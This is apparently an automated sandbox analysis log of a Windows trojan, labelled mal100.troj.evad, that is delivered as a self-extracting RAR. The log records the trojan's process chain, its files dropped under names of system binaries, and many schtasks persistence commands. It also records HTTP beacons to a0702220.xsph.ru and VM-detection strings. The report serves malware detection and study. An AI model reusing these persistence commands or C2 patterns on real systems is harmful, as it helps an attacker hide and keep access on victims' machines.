Source: MrsUvRPGeImAhc.exe, 00000010.00000002.325485482.0000000001020000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://go.mic
Source: chainsavesref.exe, 00000006.00000002.296875095.00000000028F4000.00000004.00000800.00020000.00000000.sdmp, MrsUvRPGeImAhc.exe, 00000017.00000002.362535103.00000000030DB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: MrsUvRPGeImAhc.exe, 00000017.00000002.362876471.0000000003106000.00000004.00000800.00020000.00000000.sdmp, MrsUvRPGeImAhc.exe, 00000017.00000002.363114487.0000000003130000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://cp.sprinthost.ru
Source: MrsUvRPGeImAhc.exe, 00000017.00000002.362876471.0000000003106000.00000004.00000800.00020000.00000000.sdmp, MrsUvRPGeImAhc.exe, 00000017.00000002.363114487.0000000003130000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://cp.sprinthost.ru/auth/login
Source: MrsUvRPGeImAhc.exe, 00000017.00000002.362876471.0000000003106000.00000004.00000800.00020000.00000000.sdmp, MrsUvRPGeImAhc.exe, 00000017.00000002.363114487.0000000003130000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://index.from.sh/pages/game.html
Source: unknown | DNS traffic detected: queries for: a0702220.xsph.ru
Source: global traffic | HTTP traffic detected:
    GET /tolowprocessorGeneratortrack.php?rRmbiWWxEOd55k=WTgIsnKuV&e7d5ea1a013b440ebf41c5b405309b9e=b64e0d0fcd8b0e37eaa44643c1b6ab3c&94c8169d9b8cbbe19972e7f6bf4e65c1=AM5MjZxQmMhRjMzE2M5kTN2EWOwczYxYGN3UDM5YjZwM2YmRmN2EDO&rRmbiWWxEOd55k=WTgIsnKuV HTTP/1.1
    Accept: */*
    Content-Type: text/csv
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
    Host: a0702220.xsph.ru
    Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
    GET /tolowprocessorGeneratortrack.php?rRmbiWWxEOd55k=WTgIsnKuV&e7d5ea1a013b440ebf41c5b405309b9e=b64e0d0fcd8b0e37eaa44643c1b6ab3c&94c8169d9b8cbbe19972e7f6bf4e65c1=AM5MjZxQmMhRjMzE2M5kTN2EWOwczYxYGN3UDM5YjZwM2YmRmN2EDO&rRmbiWWxEOd55k=WTgIsnKuV HTTP/1.1
    Accept: */*
    Content-Type: text/csv
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
    Host: a0702220.xsph.ru
Source: cDouNOFXle.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\comproviderRuntimecommon\chainsavesref.exe | File created: C:\Windows\Web\Screen\MrsUvRPGeImAhc.exe
Source: C:\Users\user\Desktop\cDouNOFXle.exe | Code function: 0_2_0006857B
Source: C:\Users\user\Desktop\cDouNOFXle.exe | Code function: 0_2_0008D00E
Source: C:\Users\user\Desktop\cDouNOFXle.exe | Code function: 0_2_0006407E
Source: C:\Users\user\Desktop\cDouNOFXle.exe | Code function: 0_2_000770BF
Source: C:\Users\user\Desktop\cDouNOFXle.exe | Code function: 0_2_00091194
Source: C:\Users\user\Desktop\cDouNOFXle.exe | Code function: 0_2_00063281
Source: C:\Users\user\Desktop\cDouNOFXle.exe | Code function: 0_2_0006E2A0
Source: C:\Users\user\Desktop\cDouNOFXle.exe | Code function: 0_2_000802F6
Source: C:\Users\user\Desktop\cDouNOFXle.exe | Code function: 0_2_00076646
Source: C:\Users\user\Desktop\cDouNOFXle.exe | Code function: 0_2_0008070E
Source: C:\Users\user\Desktop\cDouNOFXle.exe | Code function: 0_2_0008473A
Source: C:\Users\user\Desktop\cDouNOFXle.exe | Code function: 0_2_000737C1
Source: C:\Users\user\Desktop\cDouNOFXle.exe | Code function: 0_2_000627E8
Source: C:\Users\user\Desktop\cDouNOFXle.exe | Code function: 0_2_0006E8A0
Source: C:\Users\user\Desktop\cDouNOFXle.exe | Code function: 0_2_00084969
Source: C:\Users\user\Desktop\cDouNOFXle.exe | Code function: 0_2_0006F968
Source: C:\Users\user\Desktop\cDouNOFXle.exe | Code function: 0_2_00073A3C
Source: C:\Users\user\Desktop\cDouNOFXle.exe | Code function: 0_2_00076A7B
Source: C:\Users\user\Desktop\cDouNOFXle.exe | Code function: 0_2_00080B43
Source: C:\Users\user\Desktop\cDouNOFXle.exe | Code function: 0_2_0008CB60
Source: C:\Users\user\Desktop\cDouNOFXle.exe | Code function: 0_2_00075C77
Source: C:\Users\user\Desktop\cDouNOFXle.exe | Code function: 0_2_0006ED14
Source: C:\Users\user\Desktop\cDouNOFXle.exe | Code function: 0_2_00073D6D
Source: C:\Users\user\Desktop\cDouNOFXle.exe | Code function: 0_2_0007FDFA
Source: C:\Users\user\Desktop\cDouNOFXle.exe | Code function: 0_2_0006BE13
Source: C:\Users\user\Desktop\cDouNOFXle.exe | Code function: 0_2_0006DE6C
Source: C:\Users\user\Desktop\cDouNOFXle.exe | Code function: 0_2_00065F3C
Source: C:\Users\user\Desktop\cDouNOFXle.exe | Code function: 0_2_00080F78
Source: C:\Users\user\Desktop\cDouNOFXle.exe | Code function: String function: 0007ED00 appears 31 times
Source: C:\Users\user\Desktop\cDouNOFXle.exe | Code function: String function: 0007E360 appears 52 times
Source: C:\Users\user\Desktop\cDouNOFXle.exe | Code function: String function: 0007E28C appears 35 times
Source: C:\Users\user\Desktop\cDouNOFXle.exe | Code function: 0_2_0006718C: __EH_prolog,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,
Source: cDouNOFXle.exe, 00000000.00000003.235684015.00000000054CB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamelibcrypto$ vs cDouNOFXle.exe
Source: cDouNOFXle.exe, 00000000.00000003.236067464.00000000054FA000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamelibcrypto$ vs cDouNOFXle.exe
Source: cDouNOFXle.exe, 00000000.00000003.236847427.00000000054F3000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamelibcrypto$ vs cDouNOFXle.exe
Source: cDouNOFXle.exe | Binary or memory string: OriginalFilenamelibcrypto$ vs cDouNOFXle.exe
Source: cDouNOFXle.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: C:\Users\user\Desktop\cDouNOFXle.exe | Section loaded: <pi-ms-win-core-synch-l1-2-0.dll
Source: C:\Users\user\Desktop\cDouNOFXle.exe | Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll
Source: C:\Users\user\Desktop\cDouNOFXle.exe | Section loaded: <pi-ms-win-core-synch-l1-2-0.dll
Source: C:\Users\user\Desktop\cDouNOFXle.exe | Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll
Source: C:\Users\user\Desktop\cDouNOFXle.exe | Section loaded: <pi-ms-win-core-localization-l1-2-1.dll
Source: C:\Users\user\Desktop\cDouNOFXle.exe | Section loaded: dxgidebug.dll
Source: cDouNOFXle.exe | Virustotal: Detection: 53%
Source: cDouNOFXle.exe | Metadefender: Detection: 40%
Source: cDouNOFXle.exe | ReversingLabs: Detection: 60%
Source: C:\Users\user\Desktop\cDouNOFXle.exe | File read: C:\Users\user\Desktop\cDouNOFXle.exe
Source: cDouNOFXle.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\cDouNOFXle.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: unknownProcess created: C:\Users\user\Desktop\cDouNOFXle.exe "C:\Users\user\Desktop\cDouNOFXle.exe"
            Source: C:\Users\user\Desktop\cDouNOFXle.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\comproviderRuntimecommon\et1pu6VAlkUOY7GuC90A.vbe"
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\comproviderRuntimecommon\DLLiR59GMmL352HHbgfc.bat" "
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\comproviderRuntimecommon\chainsavesref.exe C:\comproviderRuntimecommon\chainsavesref.exe
            Source: unknownProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 9 /tr "'C:\Recovery\conhost.exe'" /f
            Source: unknownProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Recovery\conhost.exe'" /rl HIGHEST /f
            Source: unknownProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 9 /tr "'C:\Recovery\conhost.exe'" /rl HIGHEST /f
            Source: unknownProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "MrsUvRPGeImAhcM" /sc MINUTE /mo 9 /tr "'C:\Windows\Web\Screen\MrsUvRPGeImAhc.exe'" /f
            Source: unknownProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "MrsUvRPGeImAhc" /sc ONLOGON /tr "'C:\Windows\Web\Screen\MrsUvRPGeImAhc.exe'" /rl HIGHEST /f
            Source: unknownProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "MrsUvRPGeImAhcM" /sc MINUTE /mo 11 /tr "'C:\Windows\Web\Screen\MrsUvRPGeImAhc.exe'" /rl HIGHEST /f
            Source: unknownProcess created: C:\Windows\Web\Screen\MrsUvRPGeImAhc.exe C:\Windows\Web\Screen\MrsUvRPGeImAhc.exe
            Source: unknownProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "MrsUvRPGeImAhcM" /sc MINUTE /mo 6 /tr "'C:\Windows\Help\mui\0409\MrsUvRPGeImAhc.exe'" /f
            Source: unknownProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "MrsUvRPGeImAhc" /sc ONLOGON /tr "'C:\Windows\Help\mui\0409\MrsUvRPGeImAhc.exe'" /rl HIGHEST /f
            Source: unknownProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "MrsUvRPGeImAhcM" /sc MINUTE /mo 7 /tr "'C:\Windows\Help\mui\0409\MrsUvRPGeImAhc.exe'" /rl HIGHEST /f
            Source: unknownProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 9 /tr "'C:\Recovery\winlogon.exe'" /f
            Source: unknownProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\Recovery\winlogon.exe'" /rl HIGHEST /f
            Source: unknownProcess created: C:\Windows\Help\mui\0409\MrsUvRPGeImAhc.exe C:\Windows\Help\mui\0409\MrsUvRPGeImAhc.exe
            Source: unknownProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 8 /tr "'C:\Recovery\winlogon.exe'" /rl HIGHEST /f
            Source: unknownProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "explorere" /sc MINUTE /mo 10 /tr "'C:\Recovery\explorer.exe'" /rl HIGHEST /f
            Source: unknownProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 12 /tr "'C:\comproviderRuntimecommon\RuntimeBroker.exe'" /f
            Source: unknownProcess created: C:\Recovery\explorer.exe C:\Recovery\explorer.exe
            Source: unknownProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\comproviderRuntimecommon\RuntimeBroker.exe'" /rl HIGHEST /f
            Source: unknownProcess created: C:\Recovery\explorer.exe C:\Recovery\explorer.exe
            Source: unknownProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 5 /tr "'C:\comproviderRuntimecommon\RuntimeBroker.exe'" /rl HIGHEST /f
            Source: unknownProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 5 /tr "'C:\comproviderRuntimecommon\backgroundTaskHost.exe'" /f
            Source: unknownProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "backgroundTaskHost" /sc ONLOGON /tr "'C:\comproviderRuntimecommon\backgroundTaskHost.exe'" /rl HIGHEST /f
            Source: unknownProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 10 /tr "'C:\comproviderRuntimecommon\backgroundTaskHost.exe'" /rl HIGHEST /f
            Source: unknownProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "ShellExperienceHostS" /sc MINUTE /mo 13 /tr "'C:\Recovery\ShellExperienceHost.exe'" /f
            Source: C:\comproviderRuntimecommon\chainsavesref.exe | Process created: unknown unknown
            Source: C:\Users\user\Desktop\cDouNOFXle.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32
            Source: C:\comproviderRuntimecommon\chainsavesref.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\comproviderRuntimecommon\chainsavesref.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\chainsavesref.exe.log
            Source: classification engine | Classification label: mal100.troj.evad.winEXE@34/22@1/1
            Source: C:\Users\user\Desktop\cDouNOFXle.exe | File read: C:\Windows\win.ini
            Source: C:\Users\user\Desktop\cDouNOFXle.exe | Code function: 0_2_00066EC9 GetLastError,FormatMessageW,
            Source: cDouNOFXle.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
            Source: C:\comproviderRuntimecommon\chainsavesref.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
            Source: C:\Windows\Web\Screen\MrsUvRPGeImAhc.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
            Source: C:\Windows\Help\mui\0409\MrsUvRPGeImAhc.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
            Source: C:\Recovery\explorer.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5080:120:WilError_01
            Source: C:\Windows\Help\mui\0409\MrsUvRPGeImAhc.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\a662db5313495af89c12e9daf05e137fcad6fcec
            Source: C:\Users\user\Desktop\cDouNOFXle.exe | Code function: 0_2_00079E1C FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,
            Source: C:\Users\user\Desktop\cDouNOFXle.exe | Command line argument: sfxname
            Source: C:\Users\user\Desktop\cDouNOFXle.exe | Command line argument: sfxstime
            Source: C:\Users\user\Desktop\cDouNOFXle.exe | Command line argument: STARTDLG
            Source: unknown | Process created: C:\Recovery\explorer.exe
            Source: C:\Windows\Help\mui\0409\MrsUvRPGeImAhc.exe | File read: C:\Windows\System32\drivers\etc\hosts
            Source: cDouNOFXle.exe | Static file information: File size 1232540 > 1048576
            Source: cDouNOFXle.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: cDouNOFXle.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
            Source: cDouNOFXle.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
            Source: cDouNOFXle.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: cDouNOFXle.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
            Source: cDouNOFXle.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
            Source: cDouNOFXle.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
            Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb | source: cDouNOFXle.exe
            Source: cDouNOFXle.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: cDouNOFXle.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: cDouNOFXle.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: cDouNOFXle.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: cDouNOFXle.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
            Source: C:\Users\user\Desktop\cDouNOFXle.exe | Code function: 0_2_0007E28C push eax; ret
            Source: C:\Users\user\Desktop\cDouNOFXle.exe | Code function: 0_2_0007ED46 push ecx; ret
            Source: cDouNOFXle.exe | Static PE information: section name: .didat
            Source: C:\Users\user\Desktop\cDouNOFXle.exe | File created: C:\comproviderRuntimecommon\__tmp_rar_sfx_access_check_4065750

            Persistence and Installation Behavior

            Source: C:\comproviderRuntimecommon\chainsavesref.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: unknown | Executable created and started: C:\Windows\Help\mui\0409\MrsUvRPGeImAhc.exe
            Source: unknown | Executable created and started: C:\Windows\Web\Screen\MrsUvRPGeImAhc.exe
            Source: C:\comproviderRuntimecommon\chainsavesref.exe | File created: C:\Recovery\explorer.exe
            Source: C:\comproviderRuntimecommon\chainsavesref.exe | File created: C:\Recovery\conhost.exe
            Source: C:\comproviderRuntimecommon\chainsavesref.exe | File created: C:\comproviderRuntimecommon\RuntimeBroker.exe
            Source: C:\comproviderRuntimecommon\chainsavesref.exe | File created: C:\comproviderRuntimecommon\backgroundTaskHost.exe
            Source: C:\comproviderRuntimecommon\chainsavesref.exe | File created: C:\Recovery\winlogon.exe
            Source: C:\comproviderRuntimecommon\chainsavesref.exe | File created: C:\Windows\Web\Screen\MrsUvRPGeImAhc.exe
            Source: C:\comproviderRuntimecommon\chainsavesref.exe | File created: C:\Recovery\ShellExperienceHost.exe
            Source: C:\comproviderRuntimecommon\chainsavesref.exe | File created: C:\Windows\Help\mui\0409\MrsUvRPGeImAhc.exe
            Source: C:\Users\user\Desktop\cDouNOFXle.exe | File created: C:\comproviderRuntimecommon\chainsavesref.exe

            Boot Survival

            Source: unknown | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 9 /tr "'C:\Recovery\conhost.exe'" /f
            Source: C:\Users\user\Desktop\cDouNOFXle.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\comproviderRuntimecommon\chainsavesref.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Web\Screen\MrsUvRPGeImAhc.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Help\mui\0409\MrsUvRPGeImAhc.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\explorer.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\explorer.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\comproviderRuntimecommon\chainsavesref.exe TID: 5176 | Thread sleep count: 2346 > 30
Source: C:\Windows\Web\Screen\MrsUvRPGeImAhc.exe TID: 5720 | Thread sleep count: 1143 > 30
Source: C:\Windows\Web\Screen\MrsUvRPGeImAhc.exe TID: 3028 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Help\mui\0409\MrsUvRPGeImAhc.exe TID: 4716 | Thread sleep count: 1491 > 30
Source: C:\Windows\Help\mui\0409\MrsUvRPGeImAhc.exe TID: 5100 | Thread sleep time: -30000s >= -30000s
Source: C:\Windows\Help\mui\0409\MrsUvRPGeImAhc.exe TID: 1668 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Recovery\explorer.exe TID: 5748 | Thread sleep count: 1035 > 30
Source: C:\Recovery\explorer.exe TID: 6120 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Recovery\explorer.exe TID: 2200 | Thread sleep count: 1161 > 30
Source: C:\Recovery\explorer.exe TID: 5532 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\Web\Screen\MrsUvRPGeImAhc.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\Help\mui\0409\MrsUvRPGeImAhc.exe | Thread delayed: delay time: 922337203685477
Source: C:\Recovery\explorer.exe | Thread delayed: delay time: 922337203685477
Source: C:\Recovery\explorer.exe | Thread delayed: delay time: 922337203685477
Source: C:\comproviderRuntimecommon\chainsavesref.exe | Window / User API: threadDelayed 2346
Source: C:\Windows\Web\Screen\MrsUvRPGeImAhc.exe | Window / User API: threadDelayed 1143
Source: C:\Windows\Help\mui\0409\MrsUvRPGeImAhc.exe | Window / User API: threadDelayed 1491
Source: C:\Recovery\explorer.exe | Window / User API: threadDelayed 1035
Source: C:\Recovery\explorer.exe | Window / User API: threadDelayed 1161
Source: C:\Windows\SysWOW64\wscript.exe | Window found: window name: WSH-Timer
Source: C:\comproviderRuntimecommon\chainsavesref.exe | Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\cDouNOFXle.exe | Code function: 0_2_0007DD72 VirtualQuery,GetSystemInfo,
Source: C:\Users\user\Desktop\cDouNOFXle.exe | Code function: 0_2_0006A5F4 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,
Source: C:\Users\user\Desktop\cDouNOFXle.exe | Code function: 0_2_0007B8E0 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,
Source: C:\Users\user\Desktop\cDouNOFXle.exe | Code function: 0_2_0008AAA8 FindFirstFileExA,
Source: C:\Windows\Web\Screen\MrsUvRPGeImAhc.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\Help\mui\0409\MrsUvRPGeImAhc.exe | Thread delayed: delay time: 922337203685477
Source: C:\Recovery\explorer.exe | Thread delayed: delay time: 922337203685477
Source: C:\Recovery\explorer.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\cDouNOFXle.exe | API call chain: ExitProcess graph end node
Source: C:\comproviderRuntimecommon\chainsavesref.exe | File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\Web\Screen\MrsUvRPGeImAhc.exe | File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\Help\mui\0409\MrsUvRPGeImAhc.exe | File Volume queried: C:\ FullSizeInformation
Source: C:\Recovery\explorer.exe | File Volume queried: C:\ FullSizeInformation
Source: C:\Recovery\explorer.exe | File Volume queried: C:\ FullSizeInformation
Source: chainsavesref.exe, 00000006.00000003.288512919.000000001B7B7000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{e6e9dfd8-98f2-11e9-90ce-806e6f6e6963}\]0m
Source: chainsavesref.exe, 00000006.00000002.304350296.000000001B7EA000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\S46gOr4pcmbmd
Source: chainsavesref.exe, 00000006.00000002.304350296.000000001B7EA000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}q91sUD2WLKC
Source: MrsUvRPGeImAhc.exe, 00000017.00000002.364421521.000000001C070000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\cDouNOFXle.exe | Code function: 0_2_0008866F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Users\user\Desktop\cDouNOFXle.exe | Code function: 0_2_0008B710 GetProcessHeap,
Source: C:\comproviderRuntimecommon\chainsavesref.exe | Process token adjusted: Debug
Source: C:\Windows\Web\Screen\MrsUvRPGeImAhc.exe | Process token adjusted: Debug
Source: C:\Windows\Help\mui\0409\MrsUvRPGeImAhc.exe | Process token adjusted: Debug
Source: C:\Recovery\explorer.exe | Process token adjusted: Debug
Source: C:\Recovery\explorer.exe | Process token adjusted: Debug
Source: C:\Users\user\Desktop\cDouNOFXle.exe | Code function: 0_2_0008753D mov eax, dword ptr fs:[00000030h]
Source: C:\comproviderRuntimecommon\chainsavesref.exe | Memory allocated: page read and write | page guard
Source: C:\Users\user\Desktop\cDouNOFXle.exe | Code function: 0_2_0007F063 SetUnhandledExceptionFilter,
Source: C:\Users\user\Desktop\cDouNOFXle.exe | Code function: 0_2_0007F22B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Users\user\Desktop\cDouNOFXle.exe | Code function: 0_2_0008866F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Users\user\Desktop\cDouNOFXle.exe | Code function: 0_2_0007EF05 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Users\user\Desktop\cDouNOFXle.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\comproviderRuntimecommon\et1pu6VAlkUOY7GuC90A.vbe"
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\comproviderRuntimecommon\DLLiR59GMmL352HHbgfc.bat" "
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\comproviderRuntimecommon\chainsavesref.exe C:\comproviderRuntimecommon\chainsavesref.exe
Source: C:\comproviderRuntimecommon\chainsavesref.exe | Process created: unknown unknown
Source: C:\comproviderRuntimecommon\chainsavesref.exe | Queries volume information: C:\comproviderRuntimecommon\chainsavesref.exe VolumeInformation
Source: C:\Windows\Web\Screen\MrsUvRPGeImAhc.exe | Queries volume information: C:\Windows\Web\Screen\MrsUvRPGeImAhc.exe VolumeInformation
Source: C:\Windows\Help\mui\0409\MrsUvRPGeImAhc.exe | Queries volume information: C:\Windows\Help\mui\0409\MrsUvRPGeImAhc.exe VolumeInformation
Source: C:\Recovery\explorer.exe | Queries volume information: C:\Recovery\explorer.exe VolumeInformation
Source: C:\Recovery\explorer.exe | Queries volume information: C:\Recovery\explorer.exe VolumeInformation
Source: C:\Users\user\Desktop\cDouNOFXle.exe | Code function: GetLocaleInfoW,GetNumberFormatW,
Source: C:\Users\user\Desktop\cDouNOFXle.exe | Code function: 0_2_0007ED5B cpuid
Source: C:\Windows\SysWOW64\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
